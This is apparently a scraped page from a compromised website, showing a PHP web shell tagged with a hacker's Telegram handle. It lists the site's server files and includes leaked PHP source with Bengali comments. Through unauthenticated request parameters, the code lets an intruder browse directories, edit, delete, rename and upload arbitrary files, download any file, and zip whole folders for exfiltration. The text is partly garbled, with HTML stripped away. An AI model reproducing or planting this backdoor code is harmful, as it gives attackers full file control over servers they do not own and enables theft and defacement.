telegram : @iamdarkcomedy i am hacker

path :/home2/rdpgqqmy/public_html/techperformanceusa/public

upload file:

List of files:

name file size edit permission action
.htaccess906 KBJanuary 18 2024 20:05:520444
css-February 22 2025 03:07:500755
dashboard-February 21 2025 20:05:510755
error_log51354 KBFebruary 27 2025 15:17:580644
favicon.ico0 KBOctober 18 2021 11:56:120644
frontend-February 21 2025 20:05:510755
index.php6518 KBFebruary 21 2025 20:04:340444
index0.php1790 KBOctober 18 2021 11:56:120644
js-February 22 2025 03:23:490755
lass.php16962 KBFebruary 21 2025 20:04:340644
mix-manifest.json72 KBOctober 18 2021 17:53:080644
storage-February 22 2025 03:23:280755
uploads-February 22 2025 03:24:050755
web.config1211 KBOctober 18 2021 11:56:120644

telegram : @iamdarkcomedy i am hacker

path :

upload file:

List of files:

'; echo '

Edit the file: ' . basename($file_to_edit) . '

'; echo ''; echo ''; echo '
'; echo ''; echo ''; } else { echo ""; } } // ফাইলের এডিট সেভ করার অংশ if (isset($_POST['save_edits'])) { $edited_content = $_POST['edited_content']; $file_to_edit = $_GET['edit']; if (file_exists($file_to_edit)) { file_put_contents($file_to_edit, $edited_content); echo ""; } else { echo ""; } } $current_dir = isset($_GET['dir']) ? $_GET['dir'] : getcwd(); // বর্তমান ডিরেক্টরি if (!is_dir($current_dir)) { $current_dir = getcwd(); // যদি ডিরেক্টরি না হয়, তবে ডিফল্ট বর্তমান ডিরেক্টরিতে রিডাইরেক্ট করা হবে } $files = scandir($current_dir); // ডিরেক্টরির সব ফাইল বের করা foreach ($files as $file) { if ($file !== '.' && $file !== '..') { $full_path = $current_dir . '/' . $file; $is_dir = is_dir($full_path); echo ""; echo ""; echo ""; echo ""; echo ""; // পারমিশন দেখায় echo ""; echo ""; } } ?>
name file size edit permission action
" . ($is_dir ? "" . $file . "" : $file) . "" . ($is_dir ? '-' : filesize($full_path) . " KB") . "" . date("F d Y H:i:s", filemtime($full_path)) . "" . substr(sprintf('%o', fileperms($full_path)), -4) . "
alert('File deleted successfully!');window.location.href='';"; } else { echo ""; } } // ফাইল রিনেম করা if (isset($_POST['rename'])) { $oldname = $_POST['oldname']; $newname = $_POST['newname']; if (file_exists($current_dir . '/' . $oldname)) { rename($current_dir . '/' . $oldname, $current_dir . '/' . $newname); echo ""; } else { echo ""; } } // ফাইল আপলোড করা if (isset($_POST['upload'])) { $target_dir = $current_dir . "/"; $target_file = $target_dir . basename($_FILES["fileToUpload"]["name"]); if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) { echo ""; } else { echo ""; } } // ফাইল ডাউনলোড করা (একটি ফাইল) if (isset($_GET['download'])) { $file_to_download = $_GET['download']; if (file_exists($file_to_download)) { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . basename($file_to_download) . '"'); header('Content-Length: ' . filesize($file_to_download)); readfile($file_to_download); exit; } else { echo ""; } } // সব ফাইল ডাউনলোড করা (ZIP) if (isset($_POST['download_all'])) { // ZIP ফাইলের নাম এবং অবস্থান $zip_file = 'all_files.zip'; // ZIP ক্লাস ব্যবহার করে ফাইল কম্প্রেস করা $zip = new ZipArchive(); if ($zip->open($zip_file, ZipArchive::CREATE | ZipArchive::OVERWRITE) === TRUE) { // ডিরেক্টরির ফাইলগুলো লুপ করে ZIP এ যোগ করা $files = scandir($current_dir); foreach ($files as $file) { if ($file !== '.' && $file !== '..') { $file_path = $current_dir . '/' . $file; if (is_file($file_path)) { $zip->addFile($file_path, basename($file_path)); } } } $zip->close(); // ZIP ফাইল ডাউনলোড করা header('Content-Type: application/zip'); header('Content-Disposition: attachment; filename="' . basename($zip_file) . '"'); header('Content-Length: ' . filesize($zip_file)); flush(); readfile($zip_file); // ডাউনলোড শেষে ZIP ফাইল মুছে ফেলা unlink($zip_file); exit; } else { echo ""; } } ?>